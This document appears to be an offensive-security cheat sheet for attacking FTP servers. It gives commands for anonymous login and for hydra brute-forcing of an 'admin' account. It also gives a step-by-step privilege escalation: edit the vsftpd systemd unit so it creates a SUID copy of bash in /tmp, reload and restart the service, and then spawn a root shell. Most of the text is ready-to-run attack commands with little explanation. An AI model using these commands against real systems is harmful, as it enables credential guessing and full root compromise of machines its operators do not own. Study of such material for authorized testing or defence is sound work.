FTP

Anonymous Login

Some installations of FTP will allow anonymous logins.

ftp <victim_ip> 
anonymous:anonymous

Brute Force

If no max attempts or any similar system is in place, simply brute force it.

hydra -l admin -P wordlist.txt victim_ip -t 64 ftp

Privilege Escalation - VSFTPD

If you can edit the vsftpd service file. You can get a root shell

Modify the service file to run the following commands:

cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell

These commands copy the /bin/bash to /tmp/root_shell and set the SUID bit on it, which would allow us to execute the binary as the owner i.e. root

Edit the /lib/systemd/system/vsftpd.service file to contain the following code:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Once the vsftpd.service file was modified, reload the daemon:

systemctl daemon-reload

This allowed us to run our modified service using

sudo /usr/sbin/service vsftpd restart

New file root_shell should now be available inside the /tmp directory

Use file to spawn a root shell.

/tmp/root_shell -p